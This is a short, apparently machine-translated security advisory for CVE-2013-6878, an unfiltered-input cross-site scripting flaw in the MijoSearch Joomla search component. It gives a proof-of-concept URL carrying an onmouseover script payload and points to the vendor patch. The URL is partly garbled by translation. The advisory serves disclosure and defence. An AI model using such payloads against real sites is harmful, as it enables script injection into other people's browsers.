Release date:
Updated on:
Affected Systems:
Joomla! MijoSearch
Description:
--------------------------------------------------------------------------------
CVE (CAN) ID: CVE-2013-6878
MijoSearch Joomla Extension is a Joomla search component.
MijoSearch Joomla Extension does not effectively filter user data after the "/component/mijosearch/search" URL. Remote attackers can exploit this vulnerability to execute arbitrary HTML and script code in the browsers of affected sites.
<* Source: Mijosoft
Link: http://www.securityfocus.com/archive/1/530359
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http: // [host]/component/mijosearch/search? Query = im % 22% 3E % 3 Cdiv % 20 onmouseover = alert % 28% 22 ImmuniWeb % 22% 29% 20 style = % 22 width: 100%; height: pixel PX; z-index: 100% 22% 3E % 3C/div % 3E & limit = 15 & order = relevance & orderd ir = desc
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Joomla!
-------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://developer.joomla.org/security/